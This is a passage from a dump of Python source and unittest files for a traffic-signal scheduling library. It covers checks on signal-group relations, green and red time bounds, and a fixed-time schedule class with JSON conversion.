TestSyncStartInputValidation.get_default_inputs()\n\n # WHEN\n SyncStart(**input_dict)\n\n # THEN no exception should occur\n\n def test_wrong_datatype_for_ids(self) -> None:\n \"\"\" Test giving wrong datatype to SyncStart for ids \"\"\"\n # GIVEN\n input_dict = TestSyncStartInputValidation.get_default_inputs()\n input_dict[\"from_id\"] = 1\n 
input_dict[\"to_id\"] = 2\n\n # WHEN initializing the synchronous start\n sync_start = SyncStart(**input_dict)\n\n # Should not give an error (datatype is converted to string); note that from_id and to_id might have swapped;\n # this is done to store this SyncStart in an unambiguous manner.\n self.assertSetEqual({sync_start.from_id, sync_start.to_id}, {\"1\", \"2\"})\n\n def test_non_unique_ids(self) -> None:\n \"\"\" Test giving two identical ids to initialize a SyncStart \"\"\"\n # GIVEN\n input_dict = TestSyncStartInputValidation.get_default_inputs()\n input_dict[\"from_id\"] = \"1\"\n input_dict[\"to_id\"] = \"1\"\n with self.assertRaises(ValueError):\n SyncStart(**input_dict)\n\n # THEN an error should be raised\n\n\nclass TestSyncStartJsonConversion(unittest.TestCase):\n def test_json_back_and_forth(self) -> None:\n \"\"\" test converting back and forth from and to json \"\"\"\n # GIVEN\n input_dict = TestSyncStartInputValidation.get_default_inputs()\n\n # WHEN\n sync_start = SyncStart(**input_dict)\n\n # THEN converting back and forth should in the end give the same result\n sync_start_dict = sync_start.to_json()\n sync_start_from_json = SyncStart.from_json(sync_start_dict=sync_start_dict)\n self.assertDictEqual(sync_start_dict, sync_start_from_json.to_json())\n\n\nclass TestCoordinationInputValidation(unittest.TestCase):\n\n @staticmethod\n def get_default_inputs() -> Dict:\n \"\"\" function to get default (valid) inputs for Coordination() \"\"\"\n return dict(from_id=\"1\", to_id=\"2\", seconds=10)\n\n def test_successful_validation(self) -> None:\n \"\"\" Test initializing Coordination object with correct input \"\"\"\n # GIVEN\n input_dict = TestCoordinationInputValidation.get_default_inputs()\n\n # WHEN\n Offset(**input_dict)\n\n # THEN no exception should occur\n\n def test_wrong_datatype_for_ids(self) -> None:\n \"\"\" Test giving wrong datatype to Coordionation for ids \"\"\"\n # GIVEN\n input_dict = TestCoordinationInputValidation.get_default_inputs()\n input_dict[\"from_id\"] = 1\n input_dict[\"to_id\"] = 2\n\n # WHEN initializing the offset\n offset = Offset(**input_dict)\n\n # Should not give an error (datatype is converted to string)\n self.assertEqual(offset.from_id, \"1\")\n self.assertEqual(offset.to_id, \"2\")\n\n def test_non_unique_ids(self) -> None:\n \"\"\" Test giving two identical ids to initialize a Coordination \"\"\"\n # GIVEN\n input_dict = TestCoordinationInputValidation.get_default_inputs()\n input_dict[\"from_id\"] = \"1\"\n input_dict[\"to_id\"] = \"1\"\n with self.assertRaises(ValueError):\n Offset(**input_dict)\n\n # THEN an error should be raised\n\n\nclass TestCoordinationJsonConversion(unittest.TestCase):\n def test_json_back_and_forth(self) -> None:\n \"\"\" test converting back and forth from and to json \"\"\"\n # GIVEN\n input_dict = TestCoordinationInputValidation.get_default_inputs()\n\n # WHEN\n offset = Offset(**input_dict)\n\n # THEN converting back and forth should in the end give the same result\n offset_dict = offset.to_json()\n offset_from_json = Offset.from_json(offset_dict=offset_dict)\n self.assertDictEqual(offset_dict, offset_from_json.to_json())\n\n\nclass TestGreenyellowLeadInputValidation(unittest.TestCase):\n\n @staticmethod\n def get_default_inputs() -> Dict:\n \"\"\" function to get default (valid) inputs for GreenyellowLead() \"\"\"\n return dict(from_id=\"1\", to_id=\"2\", min_seconds=10, max_seconds=15)\n\n def test_successful_validation(self) -> None:\n \"\"\" Test initializing GreenyellowLead object with correct input 
\"\"\"\n # GIVEN\n input_dict = TestGreenyellowLeadInputValidation.get_default_inputs()\n\n # WHEN\n GreenyellowLead(**input_dict)\n\n # THEN no exception should occur\n\n def test_wrong_datatype_for_ids(self) -> None:\n \"\"\" Test giving wrong datatype to GreenyellowLead for ids \"\"\"\n # GIVEN\n input_dict = TestGreenyellowLeadInputValidation.get_default_inputs()\n input_dict[\"from_id\"] = 1\n input_dict[\"to_id\"] = 2\n\n # WHEN initializing the greenyellow-lead\n greenyellow_lead = GreenyellowLead(**input_dict)\n\n # Should not give an error (datatype is converted to string)\n self.assertEqual(greenyellow_lead.from_id, \"1\")\n self.assertEqual(greenyellow_lead.to_id, \"2\")\n\n def test_non_unique_ids(self) -> None:\n \"\"\" Test giving two identical ids to initialize a GreenyellowLead \"\"\"\n # GIVEN\n input_dict = TestGreenyellowLeadInputValidation.get_default_inputs()\n input_dict[\"from_id\"] = \"1\"\n input_dict[\"to_id\"] = \"1\"\n with self.assertRaises(ValueError):\n GreenyellowLead(**input_dict)\n\n # THEN an error should be raised\n\n def test_minimum_exceeding_maximum(self) -> None:\n \"\"\" Test giving two identical ids to initialize a GreenyellowLead \"\"\"\n # GIVEN\n input_dict = TestGreenyellowLeadInputValidation.get_default_inputs()\n input_dict[\"min_seconds\"] = 20\n input_dict[\"max_seconds\"] = 10\n with self.assertRaises(ValueError):\n GreenyellowLead(**input_dict)\n\n # THEN an error should be raised\n\n\nclass TestGreenyellowLeadJsonConversion(unittest.TestCase):\n def test_json_back_and_forth(self) -> None:\n \"\"\" test converting back and forth from and to json \"\"\"\n # GIVEN\n input_dict = TestGreenyellowLeadInputValidation.get_default_inputs()\n\n # WHEN\n greenyellow_lead = GreenyellowLead(**input_dict)\n\n # THEN converting back and forth should in the end give the same result\n greenyellow_lead_dict = greenyellow_lead.to_json()\n greenyellow_lead_from_json = GreenyellowLead.from_json(json_dict=greenyellow_lead_dict)\n self.assertDictEqual(greenyellow_lead_dict, greenyellow_lead_from_json.to_json())\n\n\nclass TestGreenyellowTrailInputValidation(unittest.TestCase):\n\n @staticmethod\n def get_default_inputs() -> Dict:\n \"\"\" function to get default (valid) inputs for GreenyellowTrail() \"\"\"\n return dict(from_id=\"1\", to_id=\"2\", min_seconds=11, max_seconds=14)\n\n def test_successful_validation(self) -> None:\n \"\"\" Test initializing GreenyellowTrail object with correct input \"\"\"\n # GIVEN\n input_dict = TestGreenyellowTrailInputValidation.get_default_inputs()\n\n # WHEN\n GreenyellowTrail(**input_dict)\n\n # THEN no exception should occur\n\n def test_wrong_datatype_for_ids(self) -> None:\n \"\"\" Test giving wrong datatype to GreenyellowTrail for ids \"\"\"\n # GIVEN\n input_dict = TestGreenyellowTrailInputValidation.get_default_inputs()\n input_dict[\"from_id\"] = 1\n input_dict[\"to_id\"] = 2\n\n # WHEN initializing the greenyellow-lead\n greenyellow_trail = GreenyellowTrail(**input_dict)\n\n # Should not give an error (datatype is converted to string)\n self.assertEqual(greenyellow_trail.from_id, \"1\")\n self.assertEqual(greenyellow_trail.to_id, \"2\")\n\n def test_non_unique_ids(self) -> None:\n \"\"\" Test giving two identical ids to initialize a GreenyellowTrail \"\"\"\n # GIVEN\n input_dict = TestGreenyellowTrailInputValidation.get_default_inputs()\n input_dict[\"from_id\"] = \"1\"\n input_dict[\"to_id\"] = \"1\"\n with self.assertRaises(ValueError):\n GreenyellowTrail(**input_dict)\n\n # THEN an error should be raised\n\n def 
test_minimum_exceeding_maximum(self) -> None:\n \"\"\" Test giving two identical ids to initialize a Coordination \"\"\"\n # GIVEN\n input_dict = TestGreenyellowTrailInputValidation.get_default_inputs()\n input_dict[\"min_seconds\"] = 20\n input_dict[\"max_seconds\"] = 10\n with self.assertRaises(ValueError):\n GreenyellowTrail(**input_dict)\n\n # THEN an error should be raised\n\n\nclass TestGreenyellowTrailJsonConversion(unittest.TestCase):\n def test_json_back_and_forth(self) -> None:\n \"\"\" test converting back and forth from and to json \"\"\"\n # GIVEN\n input_dict = TestGreenyellowTrailInputValidation.get_default_inputs()\n\n # WHEN\n greenyellow_trail = GreenyellowTrail(**input_dict)\n\n # THEN converting back and forth should in the end give the same result\n greenyellow_trail_dict = greenyellow_trail.to_json()\n greenyellow_trail_from_json = GreenyellowTrail.from_json(json_dict=greenyellow_trail_dict)\n self.assertDictEqual(greenyellow_trail_dict, greenyellow_trail_from_json.to_json())\n"
},
{
"alpha_fraction": 0.6746776103973389,
"alphanum_fraction": 0.6770222783088684,
"avg_line_length": 36.10869598388672,
"blob_id": "d69374eebcd4eb1d04be7257b13c331123e0d7cd",
"content_id": "b3e9437d298aa113ff9866f0d4d7f39be09748cf",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1706,
"license_type": "permissive",
"max_line_length": 90,
"num_lines": 46,
"path": "/swift_cloud_py/entities/intersection/test/test_periodic_order.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom typing import Dict\n\nfrom swift_cloud_py.entities.intersection.periodic_order import PeriodicOrder\n\n\nclass TestPeriodicOrderInputValidation(unittest.TestCase):\n\n @staticmethod\n def get_default_inputs() -> Dict:\n \"\"\" function to get default (valid) inputs for PeriodicOrder() \"\"\"\n return {\"order\": [\"sg1\", \"sg2\", \"sg3\"]}\n\n def test_successful_validation(self) -> None:\n \"\"\" Test initializing PeriodicOrder object with correct input \"\"\"\n # GIVEN\n input_dict = TestPeriodicOrderInputValidation.get_default_inputs()\n\n # WHEN\n PeriodicOrder(**input_dict)\n\n # THEN no exception should occur\n\n def test_duplicate_ids(self) -> None:\n \"\"\" Test that an error is raised when the same id is used multiple times \"\"\"\n # GIVEN\n input_dict = TestPeriodicOrderInputValidation.get_default_inputs()\n input_dict[\"order\"].append(\"sg1\")\n # WHEN initializing the periodic order\n with self.assertRaises(ValueError):\n PeriodicOrder(**input_dict)\n\n\nclass TestPeriodicOrderJsonConversion(unittest.TestCase):\n def test_json_back_and_forth(self) -> None:\n \"\"\" test converting back and forth from and to json \"\"\"\n # GIVEN\n input_dict = TestPeriodicOrderInputValidation.get_default_inputs()\n\n # WHEN\n periodic_order = PeriodicOrder(**input_dict)\n\n # THEN converting back and forth should in the end give the same result\n periodic_order_dict = periodic_order.to_json()\n periodic_order_from_json = PeriodicOrder.from_json(order_dict=periodic_order_dict)\n self.assertDictEqual(periodic_order_dict, periodic_order_from_json.to_json())"
},
{
"alpha_fraction": 0.5966955423355103,
"alphanum_fraction": 0.6202846765518188,
"avg_line_length": 54.50828552246094,
"blob_id": "6d9bfa2042357824d47942cd9157fe8621056f38",
"content_id": "1cd4f8381583f3ec8140e44f71f0058914d3a585",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10047,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 181,
"path": "/swift_cloud_py/validate_safety_restrictions/test/test_violation_of_bounds.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom copy import deepcopy\nfrom typing import Optional, List\n\nfrom swift_cloud_py.common.errors import SafetyViolation\nfrom swift_cloud_py.entities.control_output.fixed_time_schedule import FixedTimeSchedule, GreenYellowInterval\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.intersection.sg_relations import Conflict\nfrom swift_cloud_py.entities.intersection.signalgroup import SignalGroup\nfrom swift_cloud_py.entities.intersection.traffic_light import TrafficLight\nfrom swift_cloud_py.entities.scenario.arrival_rates import ArrivalRates\nfrom swift_cloud_py.validate_safety_restrictions.validate_bounds import validate_bounds\n\n\nclass TestFTSValidationOfBounds(unittest.TestCase):\n \"\"\" Test whether a minimum or a maximum greenyellow time (or red time) is violated \"\"\"\n\n @staticmethod\n def get_default_signalgroup(name: str, min_greenyellow: float = 10.0, max_greenyellow: float = 80.0,\n min_red: float = 10.0, max_red: float = 80.0) -> SignalGroup:\n \"\"\" Get a default signalgroup object\"\"\"\n traffic_light = TrafficLight(capacity=0.5, lost_time=0.0)\n return SignalGroup(id=name, traffic_lights=[traffic_light],\n min_greenyellow=min_greenyellow, max_greenyellow=max_greenyellow, min_red=min_red,\n max_red=max_red, min_nr=1, max_nr=3)\n\n @staticmethod\n def get_default_intersection(additional_signalgroups: Optional[List[SignalGroup]] = None,\n additional_conflicts: Optional[List[Conflict]] = None,\n ) -> Intersection:\n \"\"\"\n Get a default intersection object with 2 conflicting signal groups \"sg1\" and \"sg2\"\n :param additional_signalgroups: signal groups to add to the intersection (besides signal group 'sg1' and 'sg2')\n :param additional_conflicts: additional conflicts to add\n (besides the conflict between signal group 'sg1' and 'sg2')\n :return: the intersection object\n \"\"\"\n if additional_signalgroups is None:\n additional_signalgroups = []\n if additional_conflicts is None:\n additional_conflicts = []\n\n signalgroup1 = TestFTSValidationOfBounds.get_default_signalgroup(name=\"sg1\")\n signalgroup2 = TestFTSValidationOfBounds.get_default_signalgroup(name=\"sg2\")\n\n conflict = Conflict(id1=\"sg1\", id2=\"sg2\", setup12=2, setup21=3)\n\n intersection = Intersection(signalgroups=[signalgroup1, signalgroup2] + additional_signalgroups,\n conflicts=[conflict] + additional_conflicts)\n\n return intersection\n\n @staticmethod\n def get_arrival_rates(signalgroups: List[SignalGroup]):\n id_to_arrival_rates = {signalgroup.id: 100 for signalgroup in signalgroups}\n return ArrivalRates(id_to_arrival_rates=id_to_arrival_rates)\n\n def test_successful_validation(self) -> None:\n \"\"\" Test validating correct fts; we will modify this schedule to violate minimum green and red times \"\"\"\n # GIVEN\n fts = FixedTimeSchedule(\n greenyellow_intervals=dict(sg1=[GreenYellowInterval(start_greenyellow=0, end_greenyellow=10),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg2=[GreenYellowInterval(start_greenyellow=30, end_greenyellow=45),\n GreenYellowInterval(start_greenyellow=75, end_greenyellow=95)]), period=100)\n intersection = TestFTSValidationOfBounds.get_default_intersection()\n\n # WHEN\n validate_bounds(intersection=intersection, fts=fts)\n\n # THEN no error should be raised\n\n def test_green_interval_too_small(self) -> None:\n \"\"\" Test green interval too short \"\"\"\n # GIVEN\n fts_org = FixedTimeSchedule(\n 
greenyellow_intervals=dict(sg1=[GreenYellowInterval(start_greenyellow=0, end_greenyellow=10),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg2=[GreenYellowInterval(start_greenyellow=30, end_greenyellow=45),\n GreenYellowInterval(start_greenyellow=75, end_greenyellow=95)]), period=100)\n\n intersection = TestFTSValidationOfBounds.get_default_intersection()\n\n for signal_group_id, index in [(\"sg1\", 0), (\"sg1\", 1), (\"sg2\", 0), (\"sg2\", 1)]:\n with self.subTest(f\"green interval {index} too small for sg={signal_group_id}\"):\n with self.assertRaises(SafetyViolation):\n fts = deepcopy(fts_org)\n\n # change the greenyellow interval to have a duration of only 5 seconds\n fts._greenyellow_intervals[signal_group_id][index].end_greenyellow = \\\n (fts._greenyellow_intervals[signal_group_id][index].start_greenyellow + 5) % fts.period\n # WHEN validating\n validate_bounds(intersection=intersection, fts=fts)\n\n # THEN an error should be raised\n\n def test_red_interval_too_small(self) -> None:\n \"\"\" Test red interval too short \"\"\"\n # GIVEN\n fts_org = FixedTimeSchedule(\n greenyellow_intervals=dict(sg1=[GreenYellowInterval(start_greenyellow=0, end_greenyellow=10),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg2=[GreenYellowInterval(start_greenyellow=30, end_greenyellow=45),\n GreenYellowInterval(start_greenyellow=75, end_greenyellow=95)]), period=100)\n\n intersection = TestFTSValidationOfBounds.get_default_intersection()\n\n for signal_group_id, index in [(\"sg1\", 0), (\"sg1\", 1), (\"sg2\", 0), (\"sg2\", 1)]:\n with self.subTest(f\"red interval {index} too small for sg={signal_group_id}\"):\n with self.assertRaises(SafetyViolation):\n fts = deepcopy(fts_org)\n prev_index = (index - 1) % 2\n\n # red time of only 5 seconds\n fts._greenyellow_intervals[signal_group_id][index].start_greenyellow = \\\n (fts._greenyellow_intervals[signal_group_id][prev_index].end_greenyellow + 5) % 100\n # WHEN validating\n validate_bounds(intersection=intersection, fts=fts)\n\n # THEN an error should be raised\n\n def test_successful_validation2(self) -> None:\n \"\"\" Test validation for correct fts; we will modify this schedule to violate maximum green and red times \"\"\"\n # GIVEN\n fts = FixedTimeSchedule(\n greenyellow_intervals=dict(sg1=[GreenYellowInterval(start_greenyellow=0, end_greenyellow=50),\n GreenYellowInterval(start_greenyellow=120, end_greenyellow=170)],\n sg2=[GreenYellowInterval(start_greenyellow=60, end_greenyellow=110),\n GreenYellowInterval(start_greenyellow=180, end_greenyellow=230)]),\n period=240)\n\n intersection = TestFTSValidationOfBounds.get_default_intersection()\n\n # WHEN\n validate_bounds(intersection=intersection, fts=fts)\n\n # THEN no error should be raised\n\n def test_green_interval_too_large(self) -> None:\n \"\"\" Test green interval too large \"\"\"\n # GIVEN\n # green interval of signalgroup 3 is too large\n fts = FixedTimeSchedule(\n greenyellow_intervals=dict(sg1=[GreenYellowInterval(start_greenyellow=0, end_greenyellow=50),\n GreenYellowInterval(start_greenyellow=120, end_greenyellow=170)],\n sg2=[GreenYellowInterval(start_greenyellow=60, end_greenyellow=110),\n GreenYellowInterval(start_greenyellow=180, end_greenyellow=230)],\n sg3=[GreenYellowInterval(start_greenyellow=0, end_greenyellow=80),\n GreenYellowInterval(start_greenyellow=120, end_greenyellow=170)]),\n period=240)\n\n signalgroup3 = TestFTSValidationOfBounds.get_default_signalgroup(name=\"sg3\", max_greenyellow=40)\n intersection = 
TestFTSValidationOfBounds.get_default_intersection(additional_signalgroups=[signalgroup3])\n\n with self.assertRaises(SafetyViolation):\n # WHEN validating\n validate_bounds(intersection=intersection, fts=fts)\n\n # THEN an error should be raised\n\n def test_red_interval_too_large(self) -> None:\n \"\"\" Test red interval too large \"\"\"\n # GIVEN\n # red interval of signalgroup 3 is too large\n fts = FixedTimeSchedule(\n greenyellow_intervals=dict(sg1=[GreenYellowInterval(start_greenyellow=0, end_greenyellow=50),\n GreenYellowInterval(start_greenyellow=120, end_greenyellow=170)],\n sg2=[GreenYellowInterval(start_greenyellow=60, end_greenyellow=110),\n GreenYellowInterval(start_greenyellow=180, end_greenyellow=230)],\n sg3=[GreenYellowInterval(start_greenyellow=0, end_greenyellow=50),\n GreenYellowInterval(start_greenyellow=120, end_greenyellow=170)]),\n period=240)\n\n signalgroup3 = TestFTSValidationOfBounds.get_default_signalgroup(name=\"sg3\", max_red=60)\n intersection = TestFTSValidationOfBounds.get_default_intersection(additional_signalgroups=[signalgroup3])\n\n with self.assertRaises(SafetyViolation):\n # WHEN validating\n validate_bounds(intersection=intersection, fts=fts)\n\n # THEN an error should be raised\n"
},
{
"alpha_fraction": 0.6602720618247986,
"alphanum_fraction": 0.667248010635376,
"avg_line_length": 58.72916793823242,
"blob_id": "a3dd17ddb6e4ad650f526a18ddf9e209269825d6",
"content_id": "d1a5ff7ff238754e1afb9dce82468c907ef7a084",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2867,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 48,
"path": "/swift_cloud_py/validate_safety_restrictions/validate_bounds.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from swift_cloud_py.common.errors import SafetyViolation\nfrom swift_cloud_py.entities.control_output.fixed_time_schedule import FixedTimeSchedule\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\n\n\ndef validate_bounds(intersection: Intersection, fts: FixedTimeSchedule, tolerance: float = 10**(-2)):\n \"\"\"\n Ensure that all bounds on greenyellow and red times are satiesfied for the specified fixed-time schedule.\n :param intersection: intersection object (this object also contains safety restrictions that a\n fixed-time schedule should satisfy)\n :param fts: FixedTimeSchedule object for which we want to check the safety restrictions\n :param tolerance: tolerance in seconds for violating safety restrictions\n :raises SafetyViolation if validations fail\n \"\"\"\n # check the duration of greenyellow times and red times\n for signalgroup in intersection.signalgroups:\n greenyellow_intervals = fts.get_greenyellow_intervals(signalgroup=signalgroup)\n # end of the last greenyellow interval\n prev_red_switch = greenyellow_intervals[-1].end_greenyellow\n\n # loop over the greenyellow intervals\n for _, interval in enumerate(greenyellow_intervals):\n # the duration of the red interval preceeding this greenyellow interval\n red_time = (interval.start_greenyellow - prev_red_switch + tolerance) % fts.period - tolerance\n\n # the duration of the greenyellow interval\n greenyellow_time = (interval.end_greenyellow - interval.start_greenyellow + tolerance) % fts.period - \\\n tolerance\n\n # check these durations for violations of the minimum and maximum durations\n if red_time < signalgroup.min_red - tolerance:\n raise SafetyViolation(\n f\"Red time of sg '{signalgroup.id}' too short ({red_time:3.1f} seconds while \"\n f\"min={signalgroup.min_red:3.1f})\")\n\n if red_time > signalgroup.max_red + tolerance:\n raise SafetyViolation(\n f\"Red time of sg '{signalgroup.id}' too long ({red_time:3.1f} seconds \"\n f\"while max={signalgroup.max_red:3.1f})\")\n if greenyellow_time < signalgroup.min_greenyellow - tolerance:\n raise SafetyViolation(\n f\"Greenyellow time of sg '{signalgroup.id}' too short ({greenyellow_time:3.1f} seconds while \"\n f\"min={signalgroup.min_greenyellow:3.1f})\")\n if greenyellow_time > signalgroup.max_greenyellow + tolerance:\n raise SafetyViolation(\n f\"Greenyellow time of sg '{signalgroup.id}' too large ({greenyellow_time:3.1f} seconds while \"\n f\"max={signalgroup.max_greenyellow:3.1f})\")\n prev_red_switch = interval.end_greenyellow\n"
},
{
"alpha_fraction": 0.6416081190109253,
"alphanum_fraction": 0.6455303430557251,
"avg_line_length": 46.992156982421875,
"blob_id": "98a93ef306fbf7c7f7807cc036f5dfb623ad1882",
"content_id": "65f24967a6185a595bd583dfc21e897b7e50bddc",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12238,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 255,
"path": "/swift_cloud_py/entities/control_output/fixed_time_schedule.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from __future__ import annotations # allows using a class as typing inside the same class\n\nfrom typing import Dict, List, Union\n\nfrom swift_cloud_py.entities.intersection.signalgroup import SignalGroup\n\n\ndef sort_by_name(name: str):\n \"\"\" function needed to sort signal groups by name \"\"\"\n return len(name), name\n\n\nSIGNALGROUP_WRONG_TYPE_MSG = \"signalgroup should be a SignalGroup object or a string\"\nEPSILON = 10**(-3) # small value used in checks to allow a very small violation of constraints caused by numeric errors\n\n\nclass FixedTimeSchedule:\n \"\"\"\n Periodically repeating schedule specifying when signal groups have a greenyellow interval.\n \"\"\"\n def __init__(self, greenyellow_intervals: Dict[str, List[GreenYellowInterval]], period: float) -> None:\n self._greenyellow_intervals = greenyellow_intervals\n self.period = float(period)\n\n self._validate()\n\n def includes_signalgroup(self, signalgroup: Union[SignalGroup, str]) -> bool:\n \"\"\"\n Check if the specified signal group is included in the schedule.\n :param signalgroup: a SignalGroup object or a signalgroup id\n :return: Boolean indicating if the signal group is included in the schedule\n \"\"\"\n if isinstance(signalgroup, SignalGroup):\n _id = signalgroup.id\n elif isinstance(signalgroup, str):\n _id = signalgroup\n else:\n raise ValueError(SIGNALGROUP_WRONG_TYPE_MSG)\n\n if _id not in self._greenyellow_intervals:\n return False\n return True\n\n def get_greenyellow_intervals(self, signalgroup: Union[SignalGroup, str]) -> List[GreenYellowInterval]:\n \"\"\"\n get all green intervals of the specifies signal group\n :param signalgroup: a SignalGroup object or a signalgroup id\n :return:\n \"\"\"\n if isinstance(signalgroup, SignalGroup):\n _id = signalgroup.id\n elif isinstance(signalgroup, str):\n _id = signalgroup\n else:\n raise ValueError(SIGNALGROUP_WRONG_TYPE_MSG)\n\n if _id not in self._greenyellow_intervals:\n raise ValueError(\"Unknown signalgroup\")\n return self._greenyellow_intervals[_id]\n\n def get_greenyellow_interval(self, signalgroup: SignalGroup, k: int) -> GreenYellowInterval:\n \"\"\"\n get the green intervals k (index starts at 0!) 
of the specified signal group\n :param signalgroup: a SignalGroup object or a signalgroup id\n :param k:\n :return:\n \"\"\"\n if isinstance(signalgroup, SignalGroup):\n _id = signalgroup.id\n elif isinstance(signalgroup, str):\n _id = signalgroup\n else:\n raise ValueError(SIGNALGROUP_WRONG_TYPE_MSG)\n\n if _id not in self._greenyellow_intervals:\n raise ValueError(\"Unknown signalgroup\")\n if k >= len(self._greenyellow_intervals[_id]):\n raise ValueError(f\"Trying to access greenyellow interval at index {k} for signalgroup {_id}, \"\n f\"but only indexes 0 until {len(self._greenyellow_intervals[_id]) - 1} exist\")\n\n return self._greenyellow_intervals[_id][k]\n\n def _validate(self) -> None:\n \"\"\" Validate input arguments of FixedTimeSchedule; raises ValueError if validation does not pass\"\"\"\n self._validate_types()\n\n for _id, intervals in self._greenyellow_intervals.items():\n self._validate_correct_order(intervals=intervals)\n self._validate_not_overlapping(intervals=intervals)\n for interval in intervals:\n self._validate_interval_within_period(interval=interval)\n\n def _validate_types(self):\n \"\"\"validate the types of the input arguments\"\"\"\n # validate structure of greenyellow_intervals\n error_message = \"greenyellow_intervals should be a dictionary mapping from a signal group id (str) to \" \\\n \"a list of GreenYellowIntervals (List[float])\"\n if not isinstance(self._greenyellow_intervals, dict):\n raise ValueError(error_message)\n for _id, intervals in self._greenyellow_intervals.items():\n\n if not isinstance(_id, str):\n raise ValueError(error_message)\n if not isinstance(intervals, list):\n raise ValueError(error_message)\n for interval in intervals:\n if not isinstance(interval, GreenYellowInterval):\n raise ValueError(error_message)\n\n def _validate_interval_within_period(self, interval: GreenYellowInterval):\n \"\"\" validate a single greenyellow interval\"\"\"\n if interval.start_greenyellow > self.period + EPSILON:\n raise ValueError(\"start_greenyellow may not exceed period duration\")\n if interval.end_greenyellow > self.period + EPSILON:\n raise ValueError(\"end_greenyellow may not exceed period duration\")\n\n @staticmethod\n def _validate_correct_order(intervals: List[GreenYellowInterval]):\n \"\"\" Validate if the greenyellow intervals of one signal group are in correct order\"\"\"\n if len(intervals) == 0:\n return\n first_interval = min(intervals, key=lambda _interval: _interval.start_greenyellow)\n index_first_interval = intervals.index(first_interval)\n # ensure that the greenyellow interval that starts first is also first\n intervals_sorted = intervals[index_first_interval:] + intervals[:index_first_interval]\n\n # test correct order\n prev_start_greenyellow = intervals_sorted[0].start_greenyellow\n for interval in intervals_sorted[1:]:\n if interval.start_greenyellow <= prev_start_greenyellow:\n raise ValueError(\n \"The greenyellow intervals of a signal group must be provided in the correct (periodic)\"\n \"order, e.g., [[10, 40], [50, 80], [80, 100]] and not [[10, 40], [80, 100], [50, 80]]\")\n prev_start_greenyellow = interval.start_greenyellow\n\n def _validate_not_overlapping(self, intervals: List[GreenYellowInterval]):\n \"\"\" Validate if the greenyellow intervals of one signal group are not overlapping\"\"\"\n if len(intervals) == 0:\n return\n first_interval = min(intervals, key=lambda _interval: _interval.start_greenyellow)\n index_first_interval = intervals.index(first_interval)\n # ensure that the greenyellow interval 
that starts first is also first\n intervals_sorted = intervals[index_first_interval:] + intervals[:index_first_interval]\n\n # -EPSILON instead of zero in case the first switch is at 0 (but due numeric errors it is slightly below zero)\n prev_time = -EPSILON\n for k, interval in enumerate(intervals_sorted):\n if interval.start_greenyellow < prev_time:\n raise ValueError(\"The greenyellow intervals of a signal group must be non-overlapping\")\n prev_time = interval.start_greenyellow\n\n if (k < len(intervals_sorted) - 1 and interval.end_greenyellow < prev_time) or (\n k == len(intervals_sorted) - 1 and\n first_interval.start_greenyellow < interval.end_greenyellow < prev_time):\n raise ValueError(\"The greenyellow intervals of a signal group must be non-overlapping\")\n\n prev_time = interval.end_greenyellow\n\n def to_json(self) -> Dict:\n \"\"\"get dictionary structure that can be stored as json with json.dumps()\"\"\"\n return {\"greenyellow_intervals\": {sg_id: [greenyellow_interval.to_json()\n for greenyellow_interval in greenyellow_intervals]\n for sg_id, greenyellow_intervals in self._greenyellow_intervals.items()},\n \"period\": self.period}\n\n @staticmethod\n def from_json(fts_dict: Dict) -> FixedTimeSchedule:\n \"\"\"Loading fixed-time schedule from json (expected same json structure as generated with to_json)\"\"\"\n return FixedTimeSchedule(greenyellow_intervals={sg_id: [GreenYellowInterval.from_json(\n greenyellow_interval_list=greenyellow_interval_list)\n for greenyellow_interval_list in greenyellow_interval_lists]\n for sg_id, greenyellow_interval_lists in fts_dict[\"greenyellow_intervals\"].items()},\n period=fts_dict[\"period\"])\n\n def __eq__(self, other: FixedTimeSchedule):\n if not isinstance(other, FixedTimeSchedule):\n raise ValueError(\"can only compare a FixedTimeSchedule to a FixedTimeSchedule\")\n\n # comparing the period duration\n if self.period != other.period:\n return False\n\n # comparing the ids\n ids = {_id for _id in self._greenyellow_intervals}\n other_ids = {_id for _id in other._greenyellow_intervals}\n if ids != other_ids:\n return False\n\n # comparing the greenyellow intervals\n for _id in ids:\n if self._greenyellow_intervals[_id] != other._greenyellow_intervals[_id]:\n return False\n\n return True\n\n def __str__(self) -> str:\n \"\"\"string representation of object\"\"\"\n string = \"fixed time schedule:\\n\"\n string += f\"\\tperiod: {self.period}\\n\"\n string += f\"\\tgreenyellow intervals:\"\n max_name = max(len(sg_id) for sg_id in self._greenyellow_intervals)\n\n # sort by name\n greenyellow_interval_tuples = sorted(self._greenyellow_intervals.items(),\n key=lambda item: sort_by_name(item[0]))\n for sg_id, greenyellow_intervals in greenyellow_interval_tuples:\n string += \"\\n\"\n # signal group name followed by semicolon, left aligned with width of max_name + 2\n string += f\"\\t\\t{sg_id + ':':<{max_name + 2}}\"\n for interval_index, interval in enumerate(greenyellow_intervals):\n if 0 < interval_index < len(greenyellow_intervals) - 1:\n string += \", \"\n elif 0 < interval_index == len(greenyellow_intervals) - 1:\n string += \" and \"\n string += f\"{str(interval)}\"\n return string\n\n\nclass GreenYellowInterval:\n \"\"\"\n A greenyellow interval; this is a general representation of the green interval itself and any other signal state\n (other than the pure red signal state) leading up 